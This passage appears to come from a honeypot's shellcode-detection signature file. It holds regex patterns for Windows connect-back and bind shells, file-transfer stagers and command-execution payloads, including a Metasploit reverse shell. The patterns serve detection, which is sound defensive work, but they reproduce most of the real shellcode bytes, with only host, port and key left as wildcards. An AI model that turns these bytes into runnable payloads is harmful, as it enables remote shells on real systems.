	"\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x56\\x04\\x89\\x46\\x10\\xFF\\x76\\x10\\x68\\xD9"
	"\\x09\\xF5\\xAD\\xE8\\xC5\\x00\\x00\\x00\\x89\\x46\\x14\\xFF\\x76\\x10\\x68\\xEC\\xF9\\xAA\\x60\\xE8"
	"\\xB5\\x00\\x00\\x00\\x89\\x46\\x18\\xFF\\x76\\x10\\x68\\xE7\\x79\\xC6\\x79\\xE8\\xA5\\x00\\x00\\x00"
	"\\x89\\x46\\x1C\\xFF\\x76\\x10\\x68\\xCB\\xED\\xFC\\x3B\\xE8\\x95\\x00\\x00\\x00\\x89\\x46\\x20\\x81"
	"\\xEC\\x90\\x01\\x00\\x00\\x54\\x68\\x01\\x01\\x00\\x00\\xFF\\x56\\x20\\x50\\x50\\x50\\x50\\x40\\x50"
	"\\x40\\x50\\xFF\\x56\\x14\\x8B\\xD8\\x68(....)\\x68\\x02\\x00(..)\\x8B\\xCC\\x6A\\x10\\x51\\x53\\xFF"
	"\\x56\\x18\\x85\\xC0\\x75\\x43\\x68\\x63\\x6D\\x64\\x00\\x89\\x66\\x30\\x83\\xEC\\x54\\x8D\\x3C\\x24"
	"\\x33\\xC9\\x83\\xC1\\x15\\xAB\\xE2\\xFD\\xC6\\x44\\x24\\x10\\x44\\xFE\\x44\\x24\\x3D\\x89\\x5C\\x24"
	"\\x48\\x89\\x5C\\x24\\x4C\\x89\\x5C\\x24\\x50\\x8D\\x44\\x24\\x10\\x54\\x50\\x51\\x51\\x51\\x6A\\x01"
	"\\x51\\x51\\xFF\\x76\\x30\\x51\\xFF\\x56\\x08\\x53\\xFF\\x56\\x1C\\xFF\\x56\\x0C";
	mapping (none,host,port);    
};  


connectbackshell::lichtenfels
{
	pattern     
	"\\xFF\\x57\\xF0\\x5A\\x8B\\xD8\\x33\\xC9\\xB1\\x04\\xE8\\x87\\x00\\x00\\x00\\x83\\xC6\\x08\\x55\\x68"
	"\\x01\\x01\\x00\\x00\\xFF\\x57\\xF0\\x85\\xC0\\x75\\x73\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF"
	"\\x57\\xF4\\x83\\xF8\\xFF\\x74\\x63\\x8B\\xD8\\x66\\xC7\\x45\\x00\\x02\\x00\\x66\\xC7\\x45\\x02(..)"
	"\\xC7\\x45\\x04(....)\\x6A\\x10\\x55\\x53\\xFF\\x57\\xFC\\x85\\xC0\\x75\\x43\\x33\\xC9\\xB1\\x11\\x57"
	"\\x8B\\xFD\\xF3\\xAB\\x5F\\xC7\\x45\\x00\\x44\\x00\\x00\\x00\\x89\\x5D\\x3C\\x89\\x5D\\x38\\x89\\x5D"
	"\\x40\\xC7\\x45\\x2C\\x01\\x01\\x00\\x00\\x8D\\x45\\x44";
	mapping (none,host,port);    
};  

connectbackshell::msf_win32_reverse
{
	pattern
	"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\\x3c\\x8b\\x7c\\x05"
	"\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99"
	"\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f"
	"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61"
	"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e"
	"\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0"
	"\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff"
	"\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x68"
	"(....)\\x66\\x68(..)\\x66\\x53\\x89\\xe1\\x95\\x68\\xec\\xf9\\xaa\\x60\\x57\\xff\\xd6\\x6a\\x10\\x51"
	"\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\\x68\\x63\\x6d\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89"
	"\\xe2\\x31\\xc0\\xf3\\xaa\\x95\\x89\\xfd\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x8d\\x7a\\x38\\xab\\xab\\xab"
	"\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x28\\xff\\xd6\\x5b\\x57\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51"
	"\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x68\\xe7"
	"\\x79\\xc6\\x79\\xff\\x75\\x04\\xff\\xd6\\xff\\x77\\xfc\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff"
	"\\xd6\\xff\\xd0";
	mapping (none,host,port);
};  


connectbackshell::hatsquad_wins
{
	pattern
	"\\xFC\\x6A\\xEB\\x52\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45"
	"\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x83\\xC7\\x01\\x8B\\x4F\\x17\\x8B\\x5F\\x1F"
	"\\x01\\xEB\\xE3\\x30\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0"
	"\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE3\\x8B"
	"\\x5F\\x23\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1B\\x01\\xEB\\x03\\x2C\\x8B"
	"\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xC0\\x64\\x8B\\x40\\x30\\x8B\\x40\\x0C\\x8B"
	"\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x31"
	"\\xDB\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\\x68"
	"\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55"
	"\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53"
	"\\x43\\x53\\x43\\x53\\xFF\\xD0\\x68(....)\\x66\\x68(..)\\x66"
	"\\x53\\x89\\xE1\\x95\\x68\\xEC\\xF9\\xAA\\x60\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55"
	"\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x6A\\x50\\x59\\x29\\xCC\\x89\\xE7"
	"\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\x95\\x89\\xFD\\xFE\\x42\\x2D\\xFE\\x42"
	"\\x2C\\x8D\\x7A\\x38\\xAB\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x28\\xFF"
	"\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68"
	"\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x68\\xE7\\x79"
	"\\xC6\\x79\\xFF\\x75\\x04\\xFF\\xD6\\xFF\\x77\\xFC\\xFF\\xD0\\x68\\xEF\\xCE\\xE0"
	"\\x60\\x53\\xFF\\xD6\\xFF\\xD0";
	mapping (none,host,port);
};  


connectbackshell::zuc_winshit
{
	pattern
	"\\xEB\\x25(..)(....)\\x02\\x06\\x6C\\x59\\x6C\\x59\\xF8\\x1D"
	"\\x9C\\xDE\\x8C\\xD1\\x4C\\x70\\xD4\\x03\\x58\\x46\\x57\\x53\\x32\\x5F\\x33\\x32"
	"\\x2E\\x44\\x4C\\x4C\\x01\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5D\\x83\\xED\\x2C"
	"\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x78\\x08"
	"\\x8D\\x5F\\x3C\\x8B\\x1B\\x01\\xFB\\x8B\\x5B\\x78\\x01\\xFB\\x8B\\x4B\\x1C\\x01"
	"\\xF9\\x8B\\x53\\x24\\x01\\xFA\\x53\\x51\\x52\\x8B\\x5B\\x20\\x01\\xFB\\x31\\xC9"
	"\\x41\\x31\\xC0\\x99\\x8B\\x34\\x8B\\x01\\xFE\\xAC\\x31\\xC2\\xD1\\xE2\\x84\\xC0"
	"\\x75\\xF7\\x0F\\xB6\\x45\\x09\\x8D\\x44\\x45\\x08\\x66\\x39\\x10\\x75\\xE1\\x66"
	"\\x31\\x10\\x5A\\x58\\x5E\\x56\\x50\\x52\\x2B\\x4E\\x10\\x41\\x0F\\xB7\\x0C\\x4A"
	"\\x8B\\x04\\x88\\x01\\xF8\\x0F\\xB6\\x4D\\x09\\x89\\x44\\x8D\\xD8\\xFE\\x4D\\x09"
	"\\x75\\xBE\\xFE\\x4D\\x08\\x74\\x17\\xFE\\x4D\\x24\\x8D\\x5D\\x1A\\x53\\xFF\\xD0"
	"\\x89\\xC7\\x6A\\x02\\x58\\x88\\x45\\x09\\x80\\x45\\x79\\x0C\\xEB\\x82\\x50\\x8B"
	"\\x45\\x04\\x35(....)\\x89\\x45\\x04\\x66\\x8B\\x45\\x02\\x66\\x35"
	"(..)\\x66\\x89\\x45\\x02\\x58\\x89\\xCE\\x31\\xDB\\x53\\x53\\x53\\x53\\x56"
	"\\x46\\x56\\xFF\\xD0\\x89\\xC7\\x55\\x58\\x66\\x89\\x30\\x6A\\x10\\x55\\x57\\xFF"
	"\\x55\\xE0\\x8D\\x45\\x88\\x50\\xFF\\x55\\xE8\\x55\\x55\\xFF\\x55\\xEC\\x8D\\x44"
	"\\x05\\x0C\\x94\\x53\\x68\\x2E\\x65\\x78\\x65\\x68\\x5C\\x63\\x6D\\x64\\x94\\x31"
	"\\xD2\\x8D\\x45\\xCC\\x94\\x57\\x57\\x57\\x53\\x53\\xFE\\xCA\\x01\\xF2\\x52\\x94"
	"\\x8D\\x45\\x78\\x50\\x8D\\x45\\x88\\x50\\xB1\\x08\\x53\\x53\\x6A\\x10\\xFE\\xCE"
	"\\x52\\x53\\x53\\x53\\x55\\xFF\\x55\\xF0\\x6A\\xFF\\xFF\\x55\\xE4";
	mapping (none,port,host,hostkey,portkey);
};


connectbackshell::hod_lsass
{
	
	pattern
	"\\xE9\\xFB\\x00\\x00\\x00\\x5F\\x64\\xA1\\x30"
	"\\x00\\x00\\x00\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x68\\x08\\x8B\\xF7\\x6A"
	"\\x04\\x59\\xE8\\x9B\\x00\\x00\\x00\\xE2\\xF9\\x68\\x33\\x32\\x00\\x00\\x68\\x77"
	"\\x73\\x32\\x5F\\x54\\xFF\\x16\\x8B\\xE8\\x6A\\x04\\x59\\xE8\\x82\\x00\\x00\\x00"
	"\\xE2\\xF9\\x81\\xEC\\x90\\x01\\x00\\x00\\x54\\x68\\x01\\x01\\x00\\x00\\xFF\\x56"
	"\\x10\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x56\\x14\\x8B\\xD8\\x68(."
	"...)\\x68\\x02\\x00(..)\\x8B\\xCC\\x6A\\x10\\x51\\x53\\xFF\\x56"
	"\\x18\\x85\\xC0\\x75\\x4A\\x68\\x63\\x6D\\x64\\x00\\x89\\x66\\x30\\x83\\xEC\\x54"
	"\\x8D\\x3C\\x24\\x6A\\x15\\x59\\xAB\\xE2\\xFD\\xC6\\x44\\x24\\x10\\x44\\xFE\\x44"
	"\\x24\\x3D\\x89\\x5C\\x24\\x48\\x89\\x5C\\x24\\x4C\\x89\\x5C\\x24\\x50\\x8D\\x44"
	"\\x24\\x10\\x54\\x50\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\xFF\\x76\\x30\\x51\\xFF"
	"\\x56\\x04\\x8B\\xCC\\x6A\\xFF\\xFF\\x31\\xFF\\x56\\x08\\x53\\xFF\\x56\\x1C\\xFF"
	"\\x56\\x0C\\x51\\x56\\x8B\\x45\\x3C\\x8B\\x54\\x28\\x78\\x03\\xD5\\x52\\x8B\\x72"
	"\\x20\\x03\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x03\\xC5\\x33\\xDB\\x0F\\xBE\\x10\\x3A"
	"\\xD6\\x74\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xF1\\x3B\\x1F\\x75\\xE7\\x5A"
	"\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04"
	"\\x8B\\x03\\xC5\\xAB\\x5E\\x59\\xC3\\xE8\\x00\\xFF\\xFF\\xFF\\x8E\\x4E\\x0E\\xEC"
	"\\x72\\xFE\\xB3\\x16\\xAD\\xD9\\x05\\xCE\\xEF\\xCE\\xE0\\x60\\xCB\\xED\\xFC\\x3B"
	"\\xD9\\x09\\xF5\\xAD\\xEC\\xF9\\xAA\\x60\\xE7\\x79\\xC6\\x79";
	mapping (none,host,port);
};


connectbackfiletransfer::halle
{
	pattern
	"\\x89\\x83\\x9B\\x00\\x00\\x00\\x53\\xE8\\xEB\\x02\\x00\\x00\\x5B\\x58\\x5F\\x5E\\xE8\\x10\\x05\\x00"
	"\\x00\\xE8\\x9C\\xFE\\xFF\\xFF\\x00\\x00\\x00\\x00(....)(..)\\x77\\x73\\x32\\x5F\\x33\\x32\\x00\\x57"
	"\\x53\\x41\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x00\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00";
	mapping (none,host,port);
/* 
 * the first 4 bytes of the transferr are the file size
 * ideas ?
 *
 */
//	flags size;

};

// taken from shellcode-generic/sch_generic_link_trans.cpp
connectbackfiletransfer::linktransfer
{
	pattern
	".*\\x53\\x53\\x68(....)\\x68\\x02\\x00(..)\\x8B\\xD4\\x8B\\xD8\\x6A"
	//                 ^^^^->ip             ^^-> port
	"\\x10\\x52\\x53\\xBA\\x63\\x30\\x60\\x5A\\xFF\\xD6\\x50\\xB4\\x02\\x50\\x55\\x53\\xBA"
	"\\x00\\x58\\x60\\xE2\\xFF\\xD6\\xBF(....)\\xFF\\xE5.*";
	//                                   ^^^^-> auth key
	mapping(none,host,port,key);
};


// taken from shellcode-generic/sch_generic_stuttgart.cpp
connectbackfiletransfer::stuttgart
{
	pattern
	"\\x50\\x50\\x68(....)\\x68\\x02\\x00"
	"(..)\\x8B\\xFC\\x50\\x6A\\x01\\x6A\\x02\\xFF"
	"\\x55\\x20\\x8B\\xD8\\x6A\\x10\\x57\\x53\\xFF\\x55"
	"\\x24\\x85\\xC0\\x75\\x59\\xC7\\x45\\x00(....)"
	"\\x50\\x6A\\x04\\x55\\x53\\xFF\\x55\\x2C";
	mapping(none,host,port,key);
};

// taken from shellcode-generic/sch_generic_wuerzburg.cpp
connectbackfiletransfer::wuerzburg
{
	pattern
	"\\xEB\\x27(..)(....)........"
	"................"
	"..............\\x2E\\x62"
	"\\x65\\x67\\x2E\\xE8\\x0A\\x00\\x00\\x00\\x8B\\x64\\x24\\x08\\x64\\x8F\\x00\\x58"
	"\\xEB\\xF1\\x33\\xDB\\x64\\xFF\\x33\\x64\\x89\\x23\\x8D\\x85\\x68\\x01\\x00\\x00"
	"\\x50\\x6A\\x01\\x68\\x01\\x00\\x1F\\x00\\xE8\\x90\\x01\\x00\\x00\\x09\\xC6\\x52"
	"\\xAE\\x0B\\xC0\\x0F\\x85\\x22\\x01\\x00\\x00\\x81\\xEC\\x00\\x02\\x00\\x00\\x54"
	"\\x68\\x01\\x01\\x00\\x00\\xE8\\x4B\\x01\\x00\\x00\\x7D\\x75\\xDE\\xCD\\x81\\xC4"
	"\\x00\\x02\\x00\\x00\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xE8\\x36\\x01\\x00\\x00\\x6A"
	"\\xF1\\x7A\\xFC\\x89\\x85\\x84\\x01\\x00\\x00\\x83\\xEC\\x40\\x66\\xC7\\x04\\x24"
	"\\x02\\x00\\x66\\x8B\\x45\\xD4\\x66\\x89\\x44\\x24\\x02\\x8B\\x45\\xD6\\x35(."
	"...)\\x89\\x44\\x24\\x04\\x2B\\xC0\\x8D\\x7C\\x24\\x08\\xAB\\xAB\\x8B"
	"\\xDC\\x6A\\x10\\x53\\xFF\\xB5\\x84\\x01\\x00\\x00\\xE8\\xF6\\x00\\x00\\x00\\x8A"
	"\\xFE\\xD8\\xED\\x83\\xC4\\x40\\x0B\\xC0\\x0F\\x85\\xAD\\x00\\x00\\x00\\x6A\\x04"
	"\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x01\\x00\\x6A\\x00\\xE8\\xFC\\x00\\x00"
	"\\x00\\xFE\\x6A\\x7A\\x69\\x89\\x85\\x7C\\x01\\x00\\x00\\x6A\\x00\\x68\\x00\\x00"
	"\\x01\\x00\\x50\\xFF\\xB5\\x84\\x01\\x00\\x00\\xE8\\xB7\\x00\\x00\\x00\\xF6\\x71"
	"\\x59\\x0E\\x50\\x6A\\x02\\xFF\\xB5\\x84\\x01\\x00\\x00\\xE8\\xA5\\x00\\x00\\x00"
	"\\x41\\x58\\x7C\\x4C\\x2B\\xC0\\x50\\x50\\x6A\\x02\\x50\\x50\\x68\\x00\\x00\\x00"
	"\\x40\\x8D\\x9D\\x6F\\x01\\x00\\x00\\x53\\xE8\\xB0\\x00\\x00\\x00\\x14\\xF1\\xF8"
	"\\x08\\x89\\x85\\x6B\\x01\\x00\\x00\\x5A\\x83\\xF8\\xFF\\x74\\x3E\\x54\\x8B\\xC4"
	"\\x6A\\x00\\x50\\x52\\xFF\\xB5\\x7C\\x01\\x00\\x00\\xFF\\xB5\\x6B\\x01\\x00\\x00"
	"\\xE8\\x88\\x00\\x00\\x00\\xC3\\xD1\\x3F\\x0F\\x59\\xFF\\xB5\\x6B\\x01\\x00\\x00"
	"\\xE8\\x78\\x00\\x00\\x00\\xD5\\xB0\\x3E\\x72\\x6A\\x05\\x8D\\x9D\\x6F\\x01\\x00"
	"\\x00\\x53\\xE8\\x66\\x00\\x00\\x00\\xAD\\x6D\\xBF\\xE8\\x6A\\x00\\xE8\\x5B\\x00"
	"\\x00\\x00\\x60\\xA2\\x8A\\x76\\x75\\x39\\x00\\x00\\x00\\x00\\x00\\x2E\\x5C\\x66"
	"\\x74\\x70\\x75\\x70\\x64\\x2E\\x65\\x78\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
	"\\x00\\x00\\x00\\x00\\x00\\x00\\x53\\x6C\\x65\\x65\\x70\\x00\\x6B\\x65\\x72\\x6E"
	"\\x65\\x6C\\x33\\x32\\x00\\x5E\\xAD\\x60\\x33\\xC0\\x2D\\xB4\\xB3\\xFF\\x87\\x50"
	"\\x35\\x7F\\x7E\\x2E\\x3C\\x50\\x05\\x24\\x21\\x04\\x1B\\x50\\x54\\xE8\\x0B\\x00"
	"\\x00\\x00\\x26\\x80\\xAC\\xC8\\x8D\\x64\\x24\\x0C\\x93\\xEB\\x08\\x5E\\xAD\\x60"
	"\\xE8\\x51\\x00\\x00\\x00\\x8B\\x4B\\x3C\\x8B\\x4C\\x19\\x78\\x03\\xCB\\x33\\xF6"
	"\\x8D\\x14\\xB3\\x03\\x51\\x20\\x8B\\x12\\x03\\xD3\\x33\\xC0\\xC1\\xC0\\x07\\x32"
	"\\x02\\x42\\x80\\x3A\\x00\\x75\\xF5\\x3B\\x44\\x24\\x1C\\x74\\x07\\x46\\x3B\\x71"
	"\\x18\\x72\\xDD\\xCC\\x8B\\x51\\x24\\x03\\xD3\\x0F\\xB7\\x14\\x72\\x8B\\x41\\x1C"
	"\\x03\\xC3\\x8B\\x04\\x90\\x03\\xC3\\x89\\x44\\x24\\x1C\\x61\\x89\\x85\\x80\\x01";
//	\\x00\\x00\\xFF\\xD0\\xFF\\xE6\\x64\\x67\\x8B\\x1E\\x30\\x00\\x8B\\x5B\\x0C\\x8B\\x5B\\x1C\\x8B\\x1B\\x8B\\x5B\\x08\\xC3\\x35\\x51\\x14\\xFD\\xBD\\x95\\x0A\\x72\\x91\\xC7\\x34\\xF9\\x71\\xC8\\x99\\xC9\\x99\\xC9\\x99\\xC9\\x12\\xD2\\xA5\\x12\\xD5\\x80\\xE1\\x9A\\x52\\xAA\\x6F\\x14\\x8D\\x2A\\x9A\\xC8\\xB9\\x12\\x8B\\x9A\\x4A\\xAA\\x59\\x58\\x59\\x9E\\xAB\\x9B\\xDB\\x19\\xA3\\x99\\xC9\\xEC\\x6C\\xA2\\xDD\\xBD\\x85\\xED\\x9E\\xDF\\xA2\\xE8\\x81\\xEB\\x44\\x55\\x12\\xC8\\xBD\\x9A\\x4A\\x96\\x2E\\x8D\\xEB\\x12\\xD8\\x85\\x9A\\x5A\\x12\\x9D\\x09\\x9A\\x5A\\x10\\xDD\\xBD\\x85\\xF8\\x10\\x1C\\x19\\x98\\x99\\xC9\\x99\\xC9\\x66\\x49\\x66\\x7F\\xFD\\xFE\\x12\\x87\\xA9\\x99\\xC9\\x12\\xC2\\x95\\x12\\xC2\\x85\\x12\\x82\\x12\\xC2\\x91\\x5A\\xB7\\xFC\\xF7\\xFD\\xB7\\x90";


	mapping(none,port,host,hostkey);	
};


// taken from shellcode-generic/sch_generic_link_bind_trans.cpp
bindfiletransfer::bindllinktransfer
{
	pattern
	"\\xba\\x83\\x53\\x83\\x00\\xff\\xd6\\x53\\x53\\x53\\x68\\x02\\x00"
	"(..)\\x8b\\xd4\\x8b\\xd8\\x6a\\x10\\x52\\x53\\xba\\x00\\x90"
	"\\xa6\\xc2\\xff\\xd6\\x40\\x50\\x53\\xba\\x7a\\x3b\\x73\\xa1\\xff"
	"\\xd6\\x50\\x50\\x53\\xba\\x10\\xd3\\x69\\x00\\xff\\xd6\\x8b\\xd8"
	"\\x33\\xc0\\x50\\xb4\\x02\\x50\\x55\\x53\\xba\\x00\\x58\\x60\\xe2"
	"\\xff\\xd6\\xbf(....)\\xff\\xe5";

	mapping (none,port,key);
};


bindfiletransfer::amberg
{
	pattern
	"\\xeb\\x02\\xeb\\x6b"
	"\\xe8\\xf9\\xff\\xff\\xff\\x53\\x55\\x56\\x57\\x8b\\x6c\\x24\\x18\\x8b\\x45\\x3c"
	"\\x8b\\x54.\\x78\\x03\\xd5\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x03\\xdd\\xe3\\x32"
	"\\x49\\x8b\\x34\\x8b\\x03\\xf5\\x33\\xff\\xfc\\x33\\xc0\\xac..\\x74\\x07"
	"\\xc1\\xcf\\x0d\\x03\\xf8\\xeb\\xf2\\x3b\\x7c\\x24\\x14\\x75\\xe1\\x8b\\x5a\\x24"
	"\\x03\\xdd\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x03\\xdd\\x8b\\x04\\x8b\\x03\\xc5"
	"\\xeb\\x02\\x33\\xc0\\x5f\\x5e\\x5d\\x5b\\x89\\x44\\x24\\x04\\x8b\\x04\\x24\\x89"
	"\\x44\\x24\\x08\\x8b\\x44\\x24\\x04\\x83\\xc4\\x08\\xc3\\x5e\\x6a\\x30\\x59\\x64"
	"\\x8b\\x19\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x7b\\x08\\x83\\xec\\x1c"
	"\\x8b\\xec\\x33\\xc0\\x50\\x68\\x2e\\x65\\x78\\x65\\x89\\x65\\x14\\x57\\x68\\xea"
	"\\x49\\x8a\\xe8\\xff\\xd6\\x6a\\x06\\xff\\x75\\x14\\xff\\xd0\\x89\\x45\\x04\\x57"
	"\\x68\\xdb\\x8a\\x23\\xe9\\xff\\xd6\\x89\\x45\\x0c\\x57\\x68\\x8e\\x4e\\x0e\\xec"
	"\\xff\\xd6\\x33\\xc9\\x66\\xb9\\x6c\\x6c\\x51\\x68\\x33\\x32\\x2e\\x64\\x68\\x77"
	"\\x73\\x32\\x5f\\x54\\xff\\xd0\\x8b\\xd8\\x53\\x68\\xb6\\x19\\x18\\xe7\\xff\\xd6"
	"\\x89\\x45\\x10\\x53\\x68\\xe7\\x79\\xc6\\x79\\xff\\xd6\\x89\\x45\\x18\\x53\\x68"
	"\\x6e\\x0b\\x2f\\x49\\xff\\xd6\\x6a\\x06\\x6a\\x01\\x6a\\x02\\xff\\xd0\\x89\\x45"
	"\\x08\\x33\\xc0\\x50\\x50\\x50\\xb8\\x02\\xff(..)\\x80\\xf4\\xff\\x50\\x8b"
	"\\xc4\\x6a\\x10\\x50\\xff\\x75\\x08\\x53\\x68\\xa4\\x1a\\x70\\xc7\\xff\\xd6\\xff"
	"\\xd0\\x58\\x53\\x68\\xa4\\xad\\x2e\\xe9\\xff\\xd6\\x6a\\x10\\xff\\x75\\x08\\xff"
	"\\xd0\\x33\\xc0\\x50\\x50\\xff\\x75\\x08\\x53\\x68\\xe5\\x49\\x86\\x49\\xff\\xd6"
	"\\xff\\xd0\\x8b\\x4d\\x08\\x89\\x45\\x08\\x51\\xff\\x55\\x18\\x81\\xc4\\xfc\\xfe"
	"\\xff\\xff\\x8b\\xdc\\x33\\xc9\\x51\\xb1\\xff\\x51\\x53\\xff\\x75\\x08\\xff\\x55"
	"\\x10\\x85\\xc0\\x7e\\x0a\\x50\\x53\\xff\\x75\\x04\\xff\\x55\\x0c\\xeb\\xe5\\xff"
	"\\x75\\x08\\xff\\x55\\x18\\x57\\x68\\x5b\\x4c\\x1a\\xdd\\xff\\xd6\\xff\\x75\\x04"
	"\\xff\\xd0\\x33\\xc0\\x50\\xff\\x75\\x14\\x57\\x68\\x98\\xfe\\x8a\\x0e\\xff\\xd6"
	"\\xff\\xd0\\x57\\x68\\xef\\xce\\xe0\\x60\\xff\\xd6\\xff\\xd0";

	mapping (none,port);
};




// taken from shellcode-generic/sch_generic_cmd.cpp
execute::cmd
{
	pattern
	".*(cmd.* /.*(\\x00|\\x0D\\x0A)).*";
	mapping (command);
};

// taken from shellcode-generic/sch_generic_createprocess.cpp
execute::createprocess
{
	pattern
	"^.*\\x0A\\x65\\x73\\x73.*\\x57\\xE8....(.*)\\x6A.\\xE8....+$";
	mapping (command);
};

// taken from shellcode-generic/sch_generic_winexec.cpp
execute::winexec
{
	pattern
	"\\xE8\\x46\\x00\\x00\\x00\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20"
	"\\x01\\xEB\\xE3\\x2E\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA"
	"\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x04\\x75\\xE3\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B"
	"\\x8B\\x5F\\x1C\\x01\\xEB\\x8B\\x1C\\x8B\\x01\\xEB\\x89\\x5C\\x24\\x04\\xC3\\x31\\xC0\\x64\\x8B\\x40"
	"\\x30\\x85\\xC0\\x78\\x0F\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x68\\x08\\xE9\\x0B\\x00\\x00\\x00"
	"\\x8B\\x40\\x34\\x05\\x7C\\x00\\x00\\x00\\x8B\\x68\\x3C\\x5F\\x31\\xF6\\x60\\x56\\xEB\\x0D\\x68\\xEF"
	"\\xCE\\xE0\\x60\\x68\\x98\\xFE\\x8A\\x0E\\x57\\xFF\\xE7\\xE8\\xEE\\xFF\\xFF\\xFF(.*\\x00)";
	mapping (none,command);
};



execute::msf_win32_exec
{

/* win32_exec -  EXITFUNC=seh CMD=cmd.exe & ftp.exe Size=147 Encoder=None http://metasploit.com */

	pattern
	"\\xfc\\xe8\\x44\\x00\\x00\\x00\\x8b\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b"
	"\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99"
	"\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x04"
	"\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb"
	"\\x8b\\x1c\\x8b\\x01\\xeb\\x89\\x5c\\x24\\x04\\xc3\\x31\\xc0\\x64\\x8b\\x40\\x30"
	"\\x85\\xc0\\x78\\x0c\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x68\\x08\\xeb\\x09"
